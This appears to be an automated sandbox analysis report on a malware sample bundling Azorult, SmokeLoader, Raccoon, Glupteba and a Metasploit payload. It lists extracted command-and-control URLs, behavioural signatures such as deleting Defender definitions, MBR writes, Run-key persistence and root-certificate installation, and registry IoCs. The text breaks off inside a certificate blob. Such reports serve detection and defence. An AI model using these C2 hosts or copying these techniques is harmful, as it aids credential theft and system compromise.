azorult | 19e65276c47b1ee3d2f1a72d5ec00e914794a3ff62607477254b41b491eed281

Analysis

max time kernel
1800s
max time network
1802s
platform
windows7_x64
resource
win7v20201028
submitted
06-03-2021 13:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloads.exe
Size

11.6MB
MD5

86d9d6d6c5b307b0d5a9789965486fbf
SHA1

6a3e318c14745ffb6f92c3efb021d3baa94ee154
SHA256

19e65276c47b1ee3d2f1a72d5ec00e914794a3ff62607477254b41b491eed281
SHA512

8f0807d7b628dd616448993606a975c5ecb77130e7bf7040bc8e2932f8e45d1c3298e9e37be14eb65e9a6aed69d775fd22412d550580e1cb6ee4afc9f1361ae9

Malware Config

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://4zavr.com/upload/

http://zynds.com/upload/

http://atvua.com/upload/

http://detse.net/upload/

http://dsdett.com/upload/

http://dtabasee.com/upload/

http://yeronogles.monster/upload/

rc4.i32

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Processes:

mpcmdrun.exe

pid process

1516 mpcmdrun.exe
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

pid	process
1516	mpcmdrun.exe

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral4/memory/916-524-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba
behavioral4/memory/916-525-0x0000000001070000-0x0000000001872000-memory.dmp	family_glupteba
behavioral4/memory/916-526-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 4 IoCs

Processes:

msiexec.execmd.exe

flow pid process

28 1808 msiexec.exe
82 2060 cmd.exe
83 2060 cmd.exe
84 2060 cmd.exe

flow	pid	process
28	1808	msiexec.exe
82	2060	cmd.exe
83	2060	cmd.exe
84	2060	cmd.exe

Executes dropped EXE 45 IoCs

Processes:

keygen-step-4.exefile.exefile.exeaskinstall20.exekeygen-step-1.exeBTRSetp.exe6834865.755549966.61Install.exe6461839.717687336.84Setup.exeBDD.tmp.exeCA0.tmp.exeDriver.exeBTRSetp.execonhost.exeDriver.exePING.EXEconhost.exeC0CA61A12E4C8B38.execonhost.execonhost.exe2995659.32Driver.exeWindows Host.exeDriver.exemultitimer.exeaskinstall20.exemd2_2efs.exeDllHost.execonhost.execonhost.exeDriver.exeDriver.exesvchost.exeDriver.exeDriver.execonhost.exePING.EXEconhost.exeDriver.exeDriver.execonhost.exe

pid	process
432	keygen-step-4.exe
1032	file.exe
1608	file.exe
1320	askinstall20.exe
1808	keygen-step-1.exe
1904	BTRSetp.exe
1856	6834865.75
1496	5549966.61
1140	Install.exe
620	6461839.71
316	7687336.84
2056	Setup.exe
2296	BDD.tmp.exe
2328	CA0.tmp.exe
2352	Driver.exe
2380	BTRSetp.exe
2532	conhost.exe
2712	Driver.exe
2900	PING.EXE
2936	conhost.exe
3024	C0CA61A12E4C8B38.exe
3036	conhost.exe
3048	conhost.exe
1848	2995659.32
2200	Driver.exe
1840	Windows Host.exe
1652	Driver.exe
2692	multitimer.exe
2060	askinstall20.exe
2440	md2_2efs.exe
2376	DllHost.exe
1380	conhost.exe
2612	conhost.exe
2976	Driver.exe
2796	Driver.exe
2256	svchost.exe
2588	Driver.exe
2660	Driver.exe
2080	conhost.exe
2996	PING.EXE
2972	conhost.exe
2216	Driver.exe
2300	Driver.exe
1652	Driver.exe
1264	conhost.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\gdiview.msi	office_xlm_macros

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

6461839.712995659.32

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6461839.71
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6461839.71
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2995659.32
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2995659.32

Drops startup file 1 IoCs

Processes:

2995659.32

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 2995659.32

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	2995659.32

Loads dropped DLL 34 IoCs

Processes:

keygen-step-4.exefile.exeSetup.execonhost.exeWerFault.exeMsiExec.exeMsiExec.exe6461839.71

pid	process
432	keygen-step-4.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
1032
1032
1608	file.exe
1608	file.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
2056	Setup.exe
2056	Setup.exe
3036	conhost.exe
3036	conhost.exe
2720	WerFault.exe
2720	WerFault.exe
2720	WerFault.exe
2720	WerFault.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
2720	WerFault.exe
1580	MsiExec.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
3016	MsiExec.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
432	keygen-step-4.exe
620	6461839.71

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1776 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1776	icacls.exe

themida 3 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\6461839.71	themida
behavioral4/memory/620-144-0x0000000000890000-0x0000000000891000-memory.dmp	themida
behavioral4/memory/1848-167-0x0000000000C50000-0x0000000000C51000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

2995659.326461839.71conhost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\2995659.32"	2995659.32
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\6461839.71"	6461839.71
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	conhost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

2995659.326461839.71

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2995659.32
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6461839.71

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

66 api.ipify.org
467 api.2ip.ua
468 api.2ip.ua
471 api.2ip.ua
511 ip-api.com
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

Setup.execonhost.exe

description ioc process

File opened for modification \??\PhysicalDrive0 Setup.exe
File opened for modification \??\PhysicalDrive0 conhost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

6461839.71Setup.exe2995659.32conhost.exe

pid process

620 6461839.71
2056 Setup.exe
1848 2995659.32
2532 conhost.exe

flow	ioc
66	api.ipify.org
467	api.2ip.ua
468	api.2ip.ua
471	api.2ip.ua
511	ip-api.com

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	conhost.exe

pid	process
620	6461839.71
2056	Setup.exe
1848	2995659.32
2532	conhost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

BDD.tmp.exeCA0.tmp.exe

description	pid	process	target process
PID 2296 set thread context of 2712	2296	BDD.tmp.exe	Driver.exe
PID 2328 set thread context of 2900	2328	CA0.tmp.exe	PING.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2720 1496 WerFault.exe 5549966.61
816 2648 WerFault.exe 5.exe

pid	pid_target	process	target process
2720	1496	WerFault.exe	5549966.61
816	2648	WerFault.exe	5.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Driver.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Driver.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Driver.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

944 timeout.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2456 taskkill.exe
2764 taskkill.exe
2280 taskkill.exe
2128 taskkill.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

Downloads.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main Downloads.exe

pid	process
944	timeout.exe

pid	process
2456	taskkill.exe
2764	taskkill.exe
2280	taskkill.exe
2128	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main	Downloads.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Driver.exefile.exeDriver.exeSetup.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Driver.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104612000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Driver.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Driver.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Driver.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca